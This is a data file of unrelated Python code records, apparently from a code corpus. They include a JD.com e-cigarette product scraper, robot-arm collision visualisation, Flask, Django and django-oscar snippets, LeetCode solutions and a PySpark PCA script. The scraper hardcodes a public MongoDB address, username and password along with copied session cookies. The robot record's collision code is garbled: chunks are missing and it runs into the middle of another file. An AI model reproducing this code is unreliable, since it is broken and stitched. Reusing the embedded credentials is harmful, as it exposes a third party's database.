+{"seq_id":"149853309","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/9/28 11:48\n# @Author : yanmin\n# @File : product.py\nimport requests\nimport json\nfrom urllib.parse import quote\nimport math\nfrom re import sub\nfrom common.logger import Logger\n# from common.mysql import Mysql\nimport time\nfrom common.IPProxy import IPlist\nimport random\nfrom pymongo import MongoClient\n\nconn = MongoClient(\"114.242.177.193\", 27017)\nbnu = conn.get_database(\"bnu_project\")\nbnu.authenticate(\"zjx\", \"ZhuJiaxing2018\")\n\nproduct_db = bnu.get_collection(\"jd_product\")\n\nnow_date = lambda: time.strftime(\"%Y-%m-%d %H:%M:%S\")\n# mysql = Mysql()\n# mysql.conn()\npattern = r\"'|\\\\\"\nlog = Logger(\"jd_product\", \"jd_product.log\")\ncookies = {\n 'cookie: JAMCookie': 'true',\n 'mobilev': 'html5',\n 'USER_FLAG_CHECK': 'd0a0e1294dbb3ee7639c0fc4a4781849',\n '__jdv': '122270672|direct|-|none|-|1506580800101',\n 'autoOpenApp_downCloseDate_auto': '1506580800329_1800000',\n 'sid': 'dc369f41127987913250a150e80a2dec',\n '__jda': '122270672.1506580800099930694922.1506580800.1506580800.1506580800.1',\n '__jdb': '122270672.3.1506580800099930694922|1.1506580800',\n '__jdc': '122270672',\n '__jdu': '1506580800099930694922',\n 'M_Identification': 'd57d4de9e7edc6bf_4ba841349035d62f75567a54a882415c',\n 'M_Identification_abtest': '20170928144009413_54593943',\n 'abtest': '20170928144103269_29',\n 'mba_muid': '1506580800099930694922',\n 'mba_sid': '15065808001028571604646666877.3',\n}\n\nheaders = {\n 'origin': 'https://so.m.jd.com',\n 'accept-encoding': 'gzip, deflate, br',\n 'x-requested-with': 'XMLHttpRequest',\n 'accept-language': 'zh-CN,zh;q=0.8',\n 'user-agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Mobile Safari/537.36',\n 'content-type': 'application/x-www-form-urlencoded',\n 'accept': 'application/json',\n 'referer': 'https://so.m.jd.com/products/100001560-300015284-14228.html',\n 'authority': 'so.m.jd.com',\n}\n\nkeywords = [\"电子烟\", \"烟油\", \"烟嘴\"]\n\n# 14228为电子烟,14229为烟油,14231为烟嘴\n# categoryId = \"14229\"\ndef get_product(page, keyword):\n data = [\n ('keyword', quote(keyword)),\n ('datatype', '1'), # 按照销量排列\n ('page', page), # 商品所在页面,每页大概10个商品,(不确定)\n ('pagesize', '10'), # 烟油子类\n ]\n res = requests.post('https://so.m.jd.com/ware/search._m2wq_list', data=data, headers=headers, cookies=cookies).text[9:-2]\n # print(res)\n content = sub(pattern, u\"’\", res)\n json_ob = json.loads(content)\n # print(json_ob)\n wareLists = json_ob['data']['searchm']['Paragraph']\n\n # 商品名称为proName\n for i in range(10):\n item = {}\n # print(wareLists)\n wareList = wareLists[i]\n item[\"productName\"] = wareList['Content']['warename']\n # 商品价格\n item[\"price\"] = wareList['dredisprice']\n # 商品ID\n item[\"productId\"] = wareList['wareid']\n # imageurl\n item[\"imageurl\"] = wareList['Content']['imageurl']\n # 评论数\n item[\"commentNum\"] = wareList['commentcount']\n # 是否京东配送\n item[\"isDelivery\"] = wareList['sendService']\n # 类别\n item[\"categoryId\"] = wareList['catid']\n\n if (item[\"isDelivery\"] == True):\n item[\"isDelivery\"] = 1\n else:\n item[\"isDelivery\"] = 0\n\n product = product_db.find_one({\"productId\": item[\"productId\"]})\n # rows, res = mysql.get_one(\"select * from jd_product WHERE productId='%s'\" % productId)\n # # print res\n # # rows代表影像的行,res表示查询到的记录\n # if rows == 0:\n if not product:\n # args = (\n # productId, productName, price, imageurl, commentNum, isDelivery, now_date(),categoryId)\n\n # sql = \"insert into jd_product(productId, productName, price, imageurl, commentNum, isDelivery,spiderTime,categoryId) VALUES('%s','%s','%s','%s','%s','%s','%s','%s')\" % args\n item[\"spiderTime\"] = now_date()\n try:\n product_db.insert_one(item)\n log.info(\"success insert item %s\" % (item[\"productId\"]))\n except:\n log.error(\"fail insert item %s,currentPage %s\" % (item[\"productId\"], page))\n\n # print(sql)\n # n = mysql.insert(sql)\n # if n == 1:\n # log.info(\"success insert item %s\" % (productId))\n # else:\n # print(sql)\n # log.error(\"fail insert item %s,currentPage %s\" % (productId, page))\n\n else:\n log.info(\"have insert productId:%s\" % (item[\"productId\"]))\n\n\ndef main(keyword):\n data = [\n # 搜索词是电子烟,烟油,烟嘴\n ('keyword', quote(keyword)),\n ('datatype', '1'), # 按照销量排列\n ('page', '1'), # 商品所在页面,每页大概10个商品,(不确定)\n ('pagesize', '10'), # 烟油子类\n ]\n res = requests.post('https://so.m.jd.com/ware/search._m2wq_list', data=data, headers=headers, cookies=cookies).text[9:-2]\n # print(res)\n content = sub(pattern, u\"’\", res)\n json_ob = json.loads(content)\n # print(json_ob)\n wareLists = json_ob['data']['searchm']\n # 总商品数为totalNum\n totalNum = wareLists['Head']['Summary']['Page']['PageCount']\n PageCount = int(totalNum) + 1\n log.info(PageCount)\n for i in range(1, PageCount):\n print(i)\n get_product(i, keyword)\n time.sleep(random.randint(0, 5))\n\n\nif __name__ == \"__main__\":\n for keyword in keywords:\n log.info(keyword + \": \")\n main(keyword)\n log.info(\"done!\")\n","sub_path":"jd_products.py","file_name":"jd_products.py","file_ext":"py","file_size_in_byte":5830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"307079150","text":"# This code represents the robot visualization ie., the movement of the robot in the given environment with fixed axis.\n\nimport numpy as np\nimport plotly.graph_objects as go\nfrom numpy import *\nfrom scipy.linalg import norm\n\n# global variables for cylinder and collision_line functions.\nstart_end = []\nradius = []\nstep_ = []\n\n\ndef plane(height):\n \n x= 500+np.linspace(0, 1000, 75)\n y= np.linspace(-800, 1000, 100)\n z= height*np.ones((5000,200))\n mycolorscale = [[0, '#aa9ce2'],\n [1, '#aa9ce2']]\n surf = go.Surface(x=x,y=y,z=z,colorscale = mycolorscale, showscale=False)\n fig.add_trace(surf)\n return fig\n \ndef JointLocations(thetas):\n \n d1 = 0.1625\n a2 = -0.425\n a3 = -0.3922\n d4 = 0.1333\n d5 = 0.0997\n d6 = 0.0996\n \n t1 = thetas[0]\n t2 = thetas[1]\n t3 = thetas[2]\n t4 = thetas[3]\n t5 = thetas[4]\n t23 = t2 + t3\n t234 = t2 + t3 + t4\n \n theta1 = [0,0,d1]\n \n theta2 = [(a2*np.cos(t1)*np.cos(t2)),\n (a2*np.cos(t2)*np.sin(t1)),\n (d1+(a2*np.sin(t2)))]\n \n theta3 = [np.cos(t1)*((a2*np.cos(t2)) + (a3*np.cos(t23))),\n ((a2*np.cos(t2)) + (a3*np.cos(t23))) *np.sin(t1),\n d1 + (a2*np.sin(t2))+(a3*np.sin(t23))]\n \n theta4 = [(np.cos(t1)*(a2*np.cos(t2)+a3*np.cos(t23)) + d4*np.sin(t1)),\n -d4*np.cos(t1) + ((a2*np.cos(t2)) + (a3*np.cos(t23)))*np.sin(t1),\n d1 + a2*np.sin(t2) + a3*np.sin(t23)]\n \n theta5 = [ d4*np.sin(t1) + (np.cos(t1) * ((a2*np.cos(t2)) + (a3*np.cos(t23)) + (d5*np.sin(t234)))),\n -d4*np.cos(t1) + (np.sin(t1) * ((a2*np.cos(t2)) + (a3*np.cos(t23)) + (d5*np.sin(t234)))),\n d1 - (d5*np.cos(t234)) + (a2*np.sin(t2)) + (a3*np.sin(t23))]\n \n theta6 = [((d4+(d6*np.cos(t5)))*np.sin(t1)) + np.cos(t1) * ((a2*np.cos(t2)) + (a3*np.cos(t23)) + (d5*np.sin(t234)) -(d6*np.cos(t234)*np.sin(t5))),\n (-np.cos(t1) * (d4+ (d6*np.cos(t5)))) + np.sin(t1) * ((a2*np.cos(t2)) + (a3*np.cos(t23)) + (d5*np.sin(t234)) - (d6*np.cos(t234)*np.sin(t5))),\n d1 - (d5*np.cos(t234)) + (a2*np.sin(t2)) + (a3*np.sin(t23)) - (d6*np.sin(t234)*np.sin(t5))]\n \n positions = [theta1,theta2,theta3,theta4,theta5,theta6]\n return positions\n\ndef SepPoints(data):\n xpoints = []\n ypoints = []\n zpoints = []\n\n for i in range(len(data)):\n xpoints.append((data[i][0]))\n ypoints.append((data[i][1]))\n zpoints.append((data[i][2]))\n \n return xpoints,ypoints,zpoints\n\ndef cylinder(r, h, a =0, nt=100, nv =50):\n theta = np.linspace(0, 2*np.pi, nt)\n v = np.linspace(a, a+h, nv )\n theta, v = np.meshgrid(theta, v)\n x = (r*np.cos(theta))\n y= (r*np.sin(theta))\n z = v\n return x, y, z\n\n\ndef Cylinder(pt1,pt2,r):\n step = 7\n data = go.Scatter3d(x=[pt1[0],pt2[0]], y=[pt1[1],pt2[1]], z=[pt1[2],pt2[2]],\n line = dict(width=50))\n fig.add_trace(data)\n \n v = subtract(pt2,pt1)\n mag = sqrt(v[0]**2 + v[1]**2 + v[2]**2)\n unit_v = [v[0]/mag, v[1]/mag, v[2]/mag]\n unit_v=asarray(unit_v)\n dist = sqrt((pt2[0]-pt1[0])**2 + (pt2[1]-pt1[1])**2 + (pt2[2]-pt1[2])**2)\n v1 = pt1\n v2 = pt2\n pdist = dist/step\n newpts_array = []\n for i in range(0, step):\n dist_v = pdist*unit_v\n newpts = pt1 + dist_v\n newpts_array.append(newpts)\n pt1 = newpts\n newpts=list(newpts)\n theta = linspace(0,2*np.pi,100)\n phi = linspace(0,np.pi,100)\n\n x = newpts[0]+r*outer(cos(theta),sin(phi))\n y = newpts[1]+r*outer(sin(theta),sin(phi)) \n z = newpts[2]+r*outer(ones(100),cos(phi))\n\n data=go.Surface(\n x=x,\n y=y,\n z=z,\n opacity=0.3\n )\n #fig.add_trace(data)\n\n nt = 100\n nv = 50\n mag_dist = norm(v)\n not_v=[1,0,0]\n \n if (unit_v == not_v).all():\n not_v = np.array([0, 1, 0])\n n1 = np.cross(unit_v, not_v)\n n1 /= norm(n1)\n n2 = np.cross(unit_v, n1)\n\n theta = np.linspace(0, 2*np.pi, nt)\n phi = linspace(0,np.pi,100)\n v = np.linspace(0, mag_dist, nv )\n rsample=np.linspace(0,r,2)\n rsample,theta = np.meshgrid(rsample,theta)\n theta1, v = np.meshgrid(theta, v)\n\n x,y,z = [v1[i] + unit_v[i] * v + r * np.sin(theta1) * n1[i] + r * np.cos(theta1) * n2[i] for i in [0, 1, 2]] \n \n \n cyl1 = go.Surface(x=x, y=y, z=z,\n showscale=False,\n opacity=0.5)\n \n\n start_end.append([v1,v2])\n radius.append(r)\n step_.append(step)\n return fig\n\n \ndef collision_line(p1,p2):\n data = go.Scatter3d(x=[p1[0],p2[0]], y=[p1[1],p2[1]], z=[p1[2],p2[2]])\n fig.add_trace(data)\n v_list = []\n for i in range(len(start_end)):\n newpts_array = []\n v = np.subtract(start_end[i][1],start_end[i][0])\n v_list.append(v)\n mag = norm(v)\n unit_v = [v[0]/mag, v[1]/mag, v[2]/mag]\n unit_v=asarray(unit_v)\n pt1 = start_end[i][0]\n pt2 = start_end[i][1]\n r = radius[i]\n step = step_[i]\n pdist = mag/step\n dist_array_ni = []\n dist_array = []\n\n for i in range(0,step):\n dist_v = pdist*unit_v\n #print(dist_v)\n newpts = pt1 + dist_v\n newpts_array.append(newpts)\n pt1 = newpts\n newpts=list(newpts)\n\n a = (p2[0]-p1[0])**2 + (p2[1]-p1[1])**2 + (p2[2]-p1[2])**2\n b = 2*((p2[0]-p1[0])*(p1[0]-newpts_array[i][0]) + (p2[1]-p1[1])*(p1[1]-newpts_array[i][1]) + (p2[2]-p1[2])*(p1[2]-newpts_array[i][2]))\n c = (newpts_array[i][0]**2 + newpts_array[i][1]**2 + newpts_array[i][2]**2 + p1[0]**2 + p1[1]**2 + p1[2]**2 - 2*(newpts_array[i][0]*p1[0] + \n newpts_array[i][1]*p1[1] + newpts_array[i][2]*p1[2]) - r**2)\n \n discriminant = b**2 - 4 * a * c\n if discriminant >= 0:\n x_1=(-b+math.sqrt(discriminant))/(2*a)\n x_2=(-b-math.sqrt(discriminant))/(2*a)\n else:\n x_1= complex((-b/(2*a)),math.sqrt(-discriminant)/(2*a))\n x_2= complex((-b/(2*a)),-math.sqrt(-discriminant)/(2*a))\n\n sol1 = [p1[0]*(1-x_2) + x_2*p2[0],\n p1[1]*(1-x_2) + x_2*p2[1],\n p1[2]*(1-x_2) + x_2*p2[2]] \n\n sol2 = [p1[0]*(1-x_1) + x_1*p2[0],\n p1[1]*(1-x_1) + x_1*p2[1],\n p1[2]*(1-x_1) + x_1*p2[2]]\n\n \n if (discriminant < 0):\n dist1 = sqrt((newpts[0]-p1[0])**2 + (newpts[1]-p1[1])**2 + (newpts[2]-p1[2])**2) - r\n dist2 = sqrt((newpts[0]-p2[0])**2 + (newpts[1]-p2[1])**2 + (newpts[2]-p2[2])**2) - r\n if dist11 or x_2<0) and (x_1>1 or x_1<0)):\n dist1 = sqrt((newpts[0]-p1[0])**2 + (newpts[1]-p1[1])**2 + (newpts-p1[2])**2) - r\n dist2 = sqrt((newpts[0]-p2[0])**2 + (newpts[1]-p2[1])**2 + (newpts[2]-p2[2])**2) - r\n if dist1 1 or x_2 < 0) and (x_1 > 1 or x_1 < 0)):\n dist1 = sqrt((sol1[0]-p1[0])**2 + (sol1[1]-p1[1])**2 + (sol1[2]-p1[2])**2)\n dist2 = sqrt((sol1[0]-p2[0])**2 + (sol1[1]-p2[1])**2 + (sol1[2]-p2[2])**2)\n if dist1 1 or x_2 < 0) and not(x_1 > 1 or x_1 < 0)):\n dist1 = sqrt((sol2[0]-p1[0])**2 + (sol2[1]-p1[1])**2 + (sol2[2]-p1[2])**2)\n dist2 = sqrt((sol2[0]-p2[0])**2 + (sol2[1]-p2[1])**2 + (sol2[2]-p2[2])**2)\n if dist1 scores[idx_max]:\n idx_max = i\n box = boxes[idx_max]\n A, B, C, D = box\n \n def distance(A,B):\n x1, y1 = A\n x2, y2 = B\n dist = math.sqrt((x2 - x1)**2 + (y2 - y1)**2)\n return dist\n \n def findDirector(A, B):\n x1, y1 = A\n x2, y2 = B\n if x2-x1 == 0:\n return [0, 0, 1]\n slope = (y2-y1)/(x2-x1)\n cornet = math.atan(slope)/math.pi\n if -1/8. < cornet < 1/8.: # horizontal-> maybe 0 or 180\n return [1, 0, 0] \n elif -3/8. <= cornet <= -1/8. or 1/8. <= cornet <= 3/8.: #diagonal\n return [0, 1, 0]\n elif -1/2. < cornet < -3/8. or 3/8. < cornet < 1/2.: #vertical 90 or 270\n return [0, 0, 1]\n if distance(A, B) > distance(A, D):\n return findDirector(A, B)\n else:\n return findDirector(A, D)\n \ndef main():\n pass\n \nif __name__ == \"__main__\":\n main() \n","sub_path":"src/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"310930931","text":"from flask import Flask,render_template\nfrom flask_socketio import SocketIO,emit\n\napp=Flask(__name__)\napp.config['SECRET_KEY']='mysecret'\nsocketio=SocketIO(app)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@socketio.on(\"submit vote\")\ndef vote(data):\n selection=data[\"selection\"]\n emit('announce vote',{\"selection\":selection},broadcast=True)\n\nif __name__==\"__main__\":\n socketio.run(app)","sub_path":"SocketIo/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"400219068","text":"from django.urls import path\nfrom offices.views import get_available_offices, book_now, save_booking, back_button, my_bookings,cancel_booking\n\n\napp_name = 'offices'\n\nurlpatterns = [\n path('', get_available_offices, name='ReservationFormView'),\n path('reserveNow////', book_now, name=\"book_now\"),\n path('doBooking////', save_booking, name=\"save_booking\"),\n path('backToHome/', back_button, name=\"back_to_homepage\"),\n path('myBookings/', my_bookings, name='my_bookings'),\n path('cancelBooking//', cancel_booking, name='cancel_booking')\n\n]\n","sub_path":"offices/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"108310686","text":"from muslimsoulmates.gallery.models import PhotoURL\nfrom muslimsoulmates.geographic.models import City\nfrom models import Message\nfrom django.db.models import Q\n\n\n\nclass Conversation(object):\n def __init__(self, *args, **kwargs):\n \"\"\"\n Get all messages that have been sent or received by this user. Provided the user has not 'deleted' them.\n \"\"\"\n self.user = kwargs.pop('user', None)\n #Get the message ids\n self.messages = Message.objects.filter(\n (Q(sender=self.user) & Q(sender_deleted=False)) |\n (Q(receiver=self.user) & Q(recipient_deleted=False)) \n ).values_list('id', flat=True)\n \n def get_correspondents(self):\n correspondents = []\n for message in self.messages:\n message = Message.objects.get(pk = message)\n if message.sender != self.user and message.sender not in correspondents:\n correspondents.append(message.sender)\n if message.receiver != self.user and message.receiver not in correspondents:\n correspondents.append(message.receiver)\n active_correspondents = [c for c in correspondents if c.is_active ]\n return active_correspondents\n \n","sub_path":"messages/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"150530012","text":"'''for i in file_list:\r\n image_dir = os.path.join(img_dir,i)\r\n image = Image.open(image_dir)\r\n img = image.crop((80,0,560,480))\r\n img.save(os.path.join(result_dir,i))\r\n'''\r\nimport os\r\nfrom PIL import Image\r\n# 이미지를 저장할 디렉토리\r\nresult_dir = r\"C:\\Users\\YongTaek\\Desktop\"\r\n\r\n# image_dir은 14*1 사진의 경로및 파일이름.\r\ndef seperate(image_dir, result_dir=result_dir):\r\n # 이미지 불러오기\r\n img = Image.open(image_dir)\r\n\r\n # 가로로 긴 이미지를 잘라서 담을 리스트\r\n img_list = []\r\n\r\n # 리스트에 간격이 일정하게 자름.\r\n for i in range(14):\r\n img_list.append(img.crop((256*i,0,256*(i+1),256)))\r\n for i in range(14):\r\n #fin_image = cv2.resize(img_list[i],(512,512))\r\n fin_image = img_list[i]\r\n fin_image.save(os.path.join(result_dir,\r\n os.path.split(image_dir)[-1].split('.')[0] + '_'+ str(i) + '.jpg'))\r\n return 0;\r\n\r\nseperate(r'C:\\Users\\YongTaek\\Desktop\\test8.jpg',result_dir=result_dir)\r\n\r\n ","sub_path":"PILcut.py","file_name":"PILcut.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"276701185","text":"\"\"\" Compiled: 2020-09-18 10:38:51 \"\"\"\n\n#__src_file__ = \"extensions/bdp_dashboard/BDPDashboard.py\"\n#----------------------------------------------------------------------------\n# (c) Copyright 2020 SunGard Front Arena. All rights reserved.\n#----------------------------------------------------------------------------\n\nimport acm\n\nallow = acm.FUser[acm.UserName()].IsAllowed('Business Data Processing', 1)\nif allow:\n acm.UX().SessionManager().StartApplication('BDP Dashboard', None)\nelse:\n print('You need to have the permission to run Business Data Processing \\\nto launch BDP Dashboard')\n","sub_path":"Extensions/BDP/FPythonCode/BDPDashboard.py","file_name":"BDPDashboard.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"487837835","text":"from opengever.base.command import BaseObjectCreatorCommand\nfrom opengever.base.command import CreateDocumentCommand\nfrom opengever.dossier.docprops import DocPropertyWriter\nfrom opengever.dossier.dossiertemplate.dossiertemplate import BEHAVIOR_INTERFACE_MAPPING\nfrom plone.dexterity.utils import iterSchemataForType\n\n\nclass CreateDocumentFromTemplateCommand(CreateDocumentCommand):\n \"\"\"Store a copy of the template in the new document's primary file field\n \"\"\"\n\n def __init__(self, context, template_doc, title, recipient_data=tuple()):\n super(CreateDocumentFromTemplateCommand, self).__init__(\n context, template_doc.file.filename, template_doc.file.data,\n title=title)\n self.recipient_data = recipient_data\n\n def execute(self):\n obj = super(CreateDocumentFromTemplateCommand, self).execute()\n DocPropertyWriter(obj, recipient_data=self.recipient_data).initialize()\n return obj\n\n\nclass CreateDossierFromTemplateCommand(BaseObjectCreatorCommand):\n \"\"\"Creates a new dossier based on the dossiertemplate.\n \"\"\"\n portal_type = 'opengever.dossier.businesscasedossier'\n\n def __init__(self, context, template):\n kw = self._get_additional_attributes(template)\n self.fields = kw[\"IOpenGeverBase\"]\n del kw[\"IOpenGeverBase\"]\n self.additional_fields = kw\n super(CreateDossierFromTemplateCommand, self).__init__(\n context, **self.fields)\n\n def execute(self):\n obj = super(CreateDossierFromTemplateCommand, self).execute()\n schemas = iterSchemataForType(self.portal_type)\n for schema in schemas:\n schema_name = BEHAVIOR_INTERFACE_MAPPING.get(\n schema.getName(), schema.getName())\n if schema_name not in self.additional_fields:\n continue\n behavior = schema(obj)\n for prop_name in self.additional_fields[schema_name]:\n setattr(behavior, prop_name,\n self.additional_fields[schema_name][prop_name])\n return obj\n\n def _get_additional_attributes(self, template):\n \"\"\"Get all templatable attributes defined in the template.\n \"\"\"\n kw = template.get_schema_values()\n fields = {}\n for key, value in kw.items():\n schema_name, prop_name = key.split(\".\")\n if schema_name not in fields:\n fields[schema_name] = {}\n fields[schema_name][prop_name] = value\n return fields\n","sub_path":"opengever/dossier/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"413228302","text":"import sys\nfrom PyQt4.QtGui import QApplication,QDialog\nfrom PyQt4 import QtCore, QtGui\nfrom qt.liveaudio import Ui_LiveAudio\n\n# def MainWindow(QtGui.QMainWindow):\n# QtGui.QMainWindow.__init__(self)\n\n# def closeEvent(self, event):\n\ndef main(argv):\n app = QApplication(sys.argv)\n window = QtGui.QMainWindow()\n# window = MainWindow()\n if len(argv) > 1:\n ui = Ui_LiveAudio(argv[1])\n else:\n ui = Ui_LiveAudio(None)\n ui.setupUi(window)\n window.show()\n sys.exit(app.exec_())\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"test_sound_only/test_sound.py","file_name":"test_sound.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"101748674","text":"\"\"\"\nhttps://leetcode.com/problems/jump-game/\nGiven an array of non-negative integers nums, you are initially positioned at the first index of the array.\n\nEach element in the array represents your maximum jump length at that position.\n\nDetermine if you are able to reach the last index.\n\n\n\nExample 1:\n\nInput: nums = [2,3,1,1,4]\nOutput: true\nExplanation: Jump 1 step from index 0 to 1, then 3 steps to the last index.\nExample 2:\n\nInput: nums = [3,2,1,0,4]\nOutput: false\nExplanation: You will always arrive at index 3 no matter what. Its maximum jump length is 0, which makes it impossible to reach the last index.\n\n\n\"\"\"\n\n\n## using recustion. Memoization Technique.\n## passed 74 test cases out of 75\n# class Solution:\n# def canJump(self, nums) -> bool:\n#\n# if nums == [0]:\n# return True\n#\n# position = 0\n# end_position = len(nums) - 1\n#\n# memo = [None] * (end_position + 1)\n# memo[end_position] = True\n#\n# return self.canJumpHelper(nums, position, end_position, memo)\n#\n# def canJumpHelper(self, nums, position, end_position, memo):\n#\n# if memo[position] is not None:\n# return memo[position]\n#\n# for i in range(1, nums[position] + 1):\n# current_position = position + i\n# if current_position <= end_position:\n# if self.canJumpHelper(nums, current_position, end_position, memo):\n# memo[position] = True\n# return memo[position]\n#\n# memo[position] = False\n# return memo[position]\n\n\n\n## Greedy Method\n##\n\"\"\"\"\nIterating right-to-left, for each position we check if there is a potential jump that reaches a GOOD index (currPosition + nums[currPosition] >= leftmostGoodIndex). If we can reach a GOOD index, then our position is itself GOOD. Also, this new GOOD position will be the new leftmost GOOD index. Iteration continues until the beginning of the array. If first position is a GOOD index then we can reach the last index from the first position.\n\n\"\"\"\n\nclass Solution:\n def canJump(self, nums) -> bool:\n n=len(nums)\n leftmostGoodIndex=n-1\n for currentPosition in range(n-1,-1,-1):\n if currentPosition+nums[currentPosition]>=leftmostGoodIndex:\n leftmostGoodIndex=currentPosition\n\n return leftmostGoodIndex==0\n\n\nobject=Solution()\n\narr=[2,3,1,1,4]\nprint(object.canJump(arr))","sub_path":"Leetcode/python/Medium/jump-game.py","file_name":"jump-game.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"130015364","text":"class Solution:\n def longestCommonSubsequence(self, text1: str, text2: str) -> int:\n matrix = [[0 for l in range(len(text1) + 1)] for l in range(len(text2) + 1)]\n\n for i in range(1, len(matrix)):\n for j in range(1, len(matrix[0])):\n if text1[j - 1] == text2[i - 1]:\n matrix[i][j] = matrix[i - 1][j - 1] + 1\n else:\n matrix[i][j] = max(matrix[i - 1][j], matrix[i][j - 1])\n\n return matrix[-1][-1]\n\n\nif __name__ == '__main__':\n solution = Solution()\n assert solution.longestCommonSubsequence('abcde', 'ace') == 3\n assert solution.longestCommonSubsequence('abc', 'abc') == 3\n assert solution.longestCommonSubsequence('abc', 'def') == 0\n","sub_path":"1143_longest_common_subsequence.py","file_name":"1143_longest_common_subsequence.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"148270705","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 19 22:46:19 2016\n\n@author: Jie\n\"\"\"\nimport pymongo\nimport requests\n\n\nurl = 'http://localhost:8080/reciter/retrieve/article/by/cwid'\n\n\ndef send_request(cwid):\n data = {'cwid': cwid}\n response = requests.get(url, data)\n print(response.json())\n\n\ndef main():\n pymongo.MongoClient(\"localhost\", 27017)\n send_request('paa2013')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"model/retrieve_pubmed_articles.py","file_name":"retrieve_pubmed_articles.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"538301899","text":"from django.conf.urls import patterns, url\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom oscar.core.application import Application\n\nfrom oscar_accounts.dashboard import views\n\n\nclass AccountsDashboardApplication(Application):\n name = None\n default_permissions = ['is_staff', ]\n\n account_list_view = views.AccountListView\n account_create_view = views.AccountCreateView\n account_update_view = views.AccountUpdateView\n account_transactions_view = views.AccountTransactionsView\n account_freeze_view = views.AccountFreezeView\n account_thaw_view = views.AccountThawView\n account_top_up_view = views.AccountTopUpView\n account_withdraw_view = views.AccountWithdrawView\n\n transfer_list_view = views.TransferListView\n transfer_detail_view = views.TransferDetailView\n\n report_deferred_income = views.DeferredIncomeReportView\n report_profit_loss = views.ProfitLossReportView\n\n def get_urls(self):\n urlpatterns = [\n url(r'^$',\n self.account_list_view.as_view(),\n name='accounts-list'),\n url(r'^create/$', self.account_create_view.as_view(),\n name='accounts-create'),\n url(r'^(?P\\d+)/update/$', self.account_update_view.as_view(),\n name='accounts-update'),\n url(r'^(?P\\d+)/$', self.account_transactions_view.as_view(),\n name='accounts-detail'),\n url(r'^(?P\\d+)/freeze/$', self.account_freeze_view.as_view(),\n name='accounts-freeze'),\n url(r'^(?P\\d+)/thaw/$', self.account_thaw_view.as_view(),\n name='accounts-thaw'),\n url(r'^(?P\\d+)/top-up/$', self.account_top_up_view.as_view(),\n name='accounts-top-up'),\n url(r'^(?P\\d+)/withdraw/$', self.account_withdraw_view.as_view(),\n name='accounts-withdraw'),\n url(r'^transfers/$', self.transfer_list_view.as_view(),\n name='transfers-list'),\n url(r'^transfers/(?P[A-Z0-9]{32})/$',\n self.transfer_detail_view.as_view(),\n name='transfers-detail'),\n url(r'^reports/deferred-income/$',\n self.report_deferred_income.as_view(),\n name='report-deferred-income'),\n url(r'^reports/profit-loss/$',\n self.report_profit_loss.as_view(),\n name='report-profit-loss'),\n ]\n return self.post_process_urls(urlpatterns)\n\n\napplication = AccountsDashboardApplication()\n","sub_path":"source/django-oscar-accounts/src/oscar_accounts/dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"99311237","text":"from pyspark.sql import SparkSession\nfrom pyspark.ml.feature import PCA\nfrom pyspark.mllib.regression import LabeledPoint\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.mllib.classification import LogisticRegressionWithLBFGS,LogisticRegressionModel\nfrom pyspark.mllib.evaluation import MulticlassMetrics\nimport time\n\nstart =time.time()\n\n#create spark session\nspark = SparkSession \\\n .builder \\\n .appName(\"logistic regression\") \\\n .getOrCreate()\n\n# read training and testing data\ntrain_datafile = \"/Users/alfred/PycharmProjects/cc2/data/Train-label-28x28.csv\"\n\ntest_datafile = \"/Users/alfred/PycharmProjects/cc2/data/Test-label-28x28.csv\"\ntrain_data = spark.read.csv(train_datafile, header=False,inferSchema=\"true\")\ntest_data = spark.read.csv(test_datafile, header=False,inferSchema=\"true\")\n\n# extract features and convert to vectors.\nassembler = VectorAssembler(inputCols=train_data.columns[1:],outputCol=\"features\")\nassembler_test = VectorAssembler(inputCols=test_data.columns[1:],outputCol=\"features\")\n\ntrain_vectors = assembler.transform(train_data).select(train_data.columns[0],\"features\")\ntest_vectors = assembler_test.transform(test_data).select(test_data.columns[0],\"features\")\n\ntrain_vectors.show(2)\n\n# use PCA reduce dimension to 75.\npca = PCA(k=75, inputCol=\"features\",outputCol='pca')\n\nmodel = pca.fit(train_vectors)\n\npca_result = model.transform(train_vectors).select(train_vectors.columns[0],'pca')\n\npca_testresult = 